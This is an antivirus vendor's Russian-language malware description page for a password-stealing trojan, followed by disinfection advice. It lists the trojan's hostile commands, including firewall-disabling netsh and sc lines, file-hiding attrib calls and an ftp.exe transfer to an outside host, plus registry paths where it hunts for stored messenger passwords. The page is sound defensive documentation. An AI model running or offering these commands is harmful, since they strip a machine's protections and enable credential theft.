Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.PWS.Siggen.39617

Добавлен в вирусную базу Dr.Web: 2012-08-15

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'stat2' = '%ALLUSERSPROFILE%\Application Data\Msn\statup.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'stat' = '%ALLUSERSPROFILE%\Application Data\Msn\statup.exe'
Создает или изменяет следующие файлы:
  • %ALLUSERSPROFILE%\Start Menu\Programs\Startup\msn.lnk
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'DoNotAllowExceptions' = '00000000'
Создает и запускает на исполнение:
  • C:\users\public\Public Document\image viewer.exe /stext msn.klm
  • C:\users\public\Public Document\msnw.exe
  • C:\users\public\Public Document\picture view.exe /stext wwsn.klm
  • C:\users\public\Public Document\picture.exe
  • C:\users\public\Public Document\picture viewer.exe /stext wmsn.klm
Запускает на исполнение:
  • <SYSTEM32>\attrib.exe -r +a +s +h "%ALLUSERSPROFILE%\Application Data\Msn"
  • <SYSTEM32>\attrib.exe +r +a +s +h "%ALLUSERSPROFILE%\Application Data"
  • <SYSTEM32>\netsh.exe firewall set opmode disable
  • <SYSTEM32>\ftp.exe -s:bmsn.klm ftp.freehostia.com
  • <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen C:\users\public\Public Document\pic.gif
  • <SYSTEM32>\attrib.exe +r a +s +h "C:\users\public\public document"
  • <SYSTEM32>\sc.exe config mpssvc start= Disabled
  • <SYSTEM32>\netsh.exe firewall set opmode mode = DISABLE profile = ALL
  • %WINDIR%\regedit.exe /s "conf.reg"
  • <SYSTEM32>\sc.exe stop MpsSvc
  • <SYSTEM32>\net1.exe stop mpssvc
  • <SYSTEM32>\net.exe stop mpssvc
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами:
  • [<HKCU>\Software\Yahoo\Pager]
  • [<HKCU>\Software\Microsoft\IdentityCRL]
  • [<HKCU>\Software\Microsoft\MessengerService]
  • [<HKCU>\Software\Google\Google Talk\Accounts]
  • [<HKCU>\Software\Microsoft\MSNMessenger]
Изменения в файловой системе:
Создает следующие файлы:
  • %ALLUSERSPROFILE%\Application Data\Msn\msn.lnk
  • %ALLUSERSPROFILE%\Application Data\Msn\keeprun.ini
  • %ALLUSERSPROFILE%\Application Data\Msn\pic.gif
  • %ALLUSERSPROFILE%\Application Data\Msn\msnw.exe
  • %ALLUSERSPROFILE%\Application Data\Msn\conf.reg
  • %ALLUSERSPROFILE%\Application Data\Msn\bmsn.klm
  • %ALLUSERSPROFILE%\Application Data\Msn\image viewer.exe
  • %ALLUSERSPROFILE%\Application Data\Msn\dmsn.klm
  • %ALLUSERSPROFILE%\Application Data\Msn\picture view.exe
  • %ALLUSERSPROFILE%\Application Data\Msn\viewer.exe
  • %ALLUSERSPROFILE%\Application Data\Msn\statu.exe
  • %HOMEPATH%\Recent\Public Document.lnk
  • %HOMEPATH%\Recent\pic.lnk
  • %ALLUSERSPROFILE%\Application Data\Msn\PIC_201227We_ _1207100 .jpg
  • %ALLUSERSPROFILE%\Application Data\Msn\picture.exe
  • %ALLUSERSPROFILE%\Application Data\Msn\picture viewer.exe
  • %ALLUSERSPROFILE%\Application Data\Msn\PIC_201227We_ _1207100 .jpeg
  • %ALLUSERSPROFILE%\Application Data\Msn\PIC_201227We_ _1207100 .jpe
  • C:\users\public\Public Document\wmsn.klm
  • C:\users\public\Public Document\msnw.exe
  • C:\users\public\Public Document\pic.gif
  • C:\users\public\Public Document\keeprun.ini
  • C:\users\public\Public Document\msn.lnk
  • C:\users\public\Public Document\picture view.exe
  • C:\users\public\Public Document\viewer.exe
  • C:\users\public\Public Document\picture.exe
  • C:\users\public\Public Document\picture viewer.exe
  • C:\users\public\Public Document\statu.exe
  • C:\users\public\Public Document\image viewer.exe
  • %ALLUSERSPROFILE%\Application Data\GLo1QVKxbHz4NDHAeO0\PCGWIN32.LI5
  • %ALLUSERSPROFILE%\Application Data\nld3mvgfbH\PCGWIN32.LI5
  • C:\users\public\Public Document\msn.klm
  • C:\users\public\Public Document\wwsn.klm
  • %ALLUSERSPROFILE%\Application Data\tLUD9bTybHz4NDH\PCGWIN32.LI5
  • C:\users\public\Public Document\conf.reg
  • C:\users\public\Public Document\dmsn.klm
  • %TEMP%\28605RBN.bat
  • C:\users\public\Public Document\bmsn.klm
Присваивает атрибут 'скрытый' для следующих файлов:
  • %ALLUSERSPROFILE%\Application Data\nld3mvgfbH\PCGWIN32.LI5
  • %ALLUSERSPROFILE%\Application Data\GLo1QVKxbHz4NDHAeO0\PCGWIN32.LI5
  • %TEMP%\28605RBN.bat
  • %ALLUSERSPROFILE%\Application Data\tLUD9bTybHz4NDH\PCGWIN32.LI5
Удаляет следующие файлы:
  • %TEMP%\28605RBN.bat
Сетевая активность:
Подключается к:
  • 'localhost':1039
  • 'ft#.##eehostia.com':21
UDP:
  • DNS ASK ft#.##eehostia.com
Другое:
Ищет следующие окна:
  • ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'RegEdit_RegEdit' WindowName: ''
  • ClassName: 'Indicator' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке